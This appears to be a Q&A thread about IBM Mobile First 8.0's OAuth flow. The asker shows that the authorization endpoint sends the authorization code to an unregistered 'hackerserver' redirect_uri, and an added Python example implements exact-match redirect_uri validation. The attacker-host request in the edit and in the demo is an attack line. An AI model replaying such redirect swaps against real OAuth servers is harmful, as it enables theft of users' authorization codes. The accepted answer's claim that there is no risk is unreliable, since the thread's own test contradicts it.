IBM Mobile First 8.0 OAuth flow "client_id" and "redirect_uri" exposed in GET request


We are using the IBM Mobile First 8.0 framework with our iOS application. The framework uses the OAuth 2.0 flow for authentication.

I see client_id and redirect_uri being passed to the authorization endpoint in a GET request. It seems this flow is actually taken care of by the Mobile First framework and I don't have any control over it.

    response_type=code
    scope=
    client_id=CLIENT_ID
    redirect_uri=REDIRECT_URL

What are the security vulnerabilities of exposing "client_id" and "redirect_uri" in a GET request?

EDIT:
I changed the redirect_uri in code and issued a request to the authorization endpoint.

http://mobilefirstserver:port/mfp/api/az/v1/authorization?response_type=code&client_id=CLIENT_ID&scope=SCOPE&redirect_uri=http://hackerserver:port/context/getdata

I thought there was some whitelisting done at the framework level, but that is not the case.

This is what I see: the authorization_code is passed to hackerserver. http://hackerserver:port/context/getdata?code=authorization_code

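The EDIT above shows what an authorization endpoint must never do: accept whatever redirect_uri the request carries and send the authorization code there. The defence is on the server side: the redirect_uri is compared by exact string match against the URIs registered for that client_id, and on a mismatch the server shows an error to the resource owner instead of redirecting (RFC 6749 sections 3.1.2.3 and 4.1.2.1). The following is an added example of that check, not IBM Mobile First code; the client registry, host names and port numbers are constructed placeholders.

```python
"""Exact-match redirect_uri validation for an OAuth 2.0 authorization endpoint.

Added illustration, not part of IBM Mobile First. All client IDs, hosts and
ports below are constructed placeholders.
"""
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed client registry: client_id -> URIs registered at onboarding time.
REGISTERED_CLIENTS = {
    "CLIENT_ID": {"https://app.example.com/context/getdata"},
}


def parse_authorization_request(url: str) -> dict:
    """Return the query parameters of an authorization request, one value each."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    # RFC 6749 section 3.1: a parameter must not appear more than once.
    for name, values in query.items():
        if len(values) != 1:
            raise ValueError(f"parameter repeated: {name}")
    return {name: values[0] for name, values in query.items()}


def redirect_uri_allowed(client_id: str, redirect_uri: str) -> bool:
    """Simple string comparison against the client's registered URIs.

    Deliberately no prefix, substring or host-only matching: a different
    scheme, host, port, path or trailing segment is a different URI.
    """
    registered = REGISTERED_CLIENTS.get(client_id)
    if not registered:
        return False  # unknown client: nothing can be trusted
    return redirect_uri in registered


def authorize(url: str) -> dict:
    """Handle an authorization request and decide where (if anywhere) to redirect.

    Returns {"error": None, "redirect": "<registered_uri>?code=..."} on success.
    On an unknown client or unregistered redirect_uri it returns an error for
    the resource owner and "redirect": None, so no code ever leaves the server
    toward a URI the client did not register.
    """
    params = parse_authorization_request(url)
    client_id = params.get("client_id", "")
    redirect_uri = params.get("redirect_uri", "")
    if not redirect_uri_allowed(client_id, redirect_uri):
        return {"error": "invalid_redirect_uri", "redirect": None}
    if params.get("response_type") != "code":
        return {"error": "unsupported_response_type", "redirect": None}
    code = secrets.token_urlsafe(32)  # stand-in for the real code issuer
    sep = "&" if urlsplit(redirect_uri).query else "?"
    return {"error": None, "redirect": f"{redirect_uri}{sep}code={code}"}


if __name__ == "__main__":
    # Constructed requests mirroring the question: one legitimate, one with a
    # swapped redirect_uri pointing at a host the client never registered.
    base = "https://mfp.example.com/mfp/api/az/v1/authorization?response_type=code&client_id=CLIENT_ID&scope="
    print(authorize(base + "&redirect_uri=https://app.example.com/context/getdata"))
    print(authorize(base + "&redirect_uri=http://hackerserver:9080/context/getdata"))
```

The order of the checks matters: redirect_uri is validated before any other error is raised, because every other OAuth error is normally delivered by redirecting to the client, and that redirect is only safe once the destination is known to be registered.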


BEST ANSWER

There are no known risks of those values being exposed. Those values are used with other encrypted data in the client SDK to identify a client. They are not enough by themselves.

Also, as iddo mentioned in the comments, you are supposed to use SSL/TLS. Someone being able to listen in on your traffic is a problem in itself, regardless of client IDs and whatnot.